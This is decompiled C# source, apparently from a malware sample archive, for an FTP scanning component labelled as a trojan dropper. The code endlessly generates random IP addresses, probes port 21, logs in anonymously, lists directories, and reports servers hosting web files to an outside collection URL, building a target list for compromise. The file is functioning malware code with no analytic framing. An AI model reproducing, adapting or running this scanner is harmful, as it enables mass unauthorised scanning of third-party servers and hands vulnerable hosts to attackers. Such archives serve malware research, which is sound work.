MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313/Ftp.cs

// Decompiled with JetBrains decompiler
// Type: FTPscanner.Ftp
// Assembly: FTPscanner, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 8469568A-499F-4FFB-88BB-33DD24B78A55
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan-Dropper.Win32.Sysn.axrz-65a382451dd46ba81b5db9e85a6a586162c5d430c853bf4f688f48a71af44313.exe

using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace FTPscanner
{
  internal class Ftp
  {
    public static void GrabBanner()
    {
      while (true)
      {
        try
        {
          string ipadress = Rng.GenerateIp();
          IPEndPoint remoteEP = new IPEndPoint(IPAddress.Parse(ipadress), 21);
          Socket socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
          try
          {
            socket.Connect((EndPoint) remoteEP);
          }
          catch
          {
          }
          NetworkStream networkStream = new NetworkStream(socket);
          if (networkStream.CanRead)
          {
            new Thread((ThreadStart) (() => Ftp.CheckHost(ipadress))).Start();
          }
          else
          {
            networkStream.Close();
            socket.Close();
          }
        }
        catch
        {
        }
      }
    }

    public static void CheckHost(string ipadress)
    {
      try
      {
        if (!(WebRequest.Create("ftp://" + ipadress) is FtpWebRequest ftpWebRequest))
          return;
        ftpWebRequest.Method = "LIST";
        ftpWebRequest.Proxy = (IWebProxy) null;
        ftpWebRequest.Credentials = (ICredentials) new NetworkCredential("anonymous", "britney@spears.com");
        ftpWebRequest.Timeout = 10000;
        if (ftpWebRequest.GetResponse() is FtpWebResponse response)
        {
          string end = new StreamReader(response.GetResponseStream(), Encoding.ASCII).ReadToEnd();
          if (end.Contains("www") || end.Contains(".php") || end.Contains(".asp"))
          {
            try
            {
              WebRequest.Create("http://sdollars.comxa.com/l.php?w=ftp://" + ipadress + " - ").GetResponse();
            }
            catch
            {
            }
            response.Close();
          }
          response.Close();
        }
      }
      catch
      {
      }
    }
  }
}